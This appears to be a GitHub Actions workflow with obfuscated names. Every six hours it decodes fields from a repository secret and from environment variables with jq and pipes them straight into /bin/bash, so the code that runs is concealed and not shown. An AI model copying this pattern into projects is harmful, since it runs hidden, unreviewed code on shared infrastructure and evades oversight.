name: zaifengzf
on:
  workflow_dispatch:
  schedule:
    - cron: '27 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zaifengzf
        env:
          jmq0574: ${{ secrets.jmq0574 }}
        run: |
          echo $jmq0574 | jq -r .d42720 | /bin/bash
          echo $vmkv57791 | jq -r .m34 | /bin/bash
          echo $b4 | jq -r .ej6 | /bin/bash

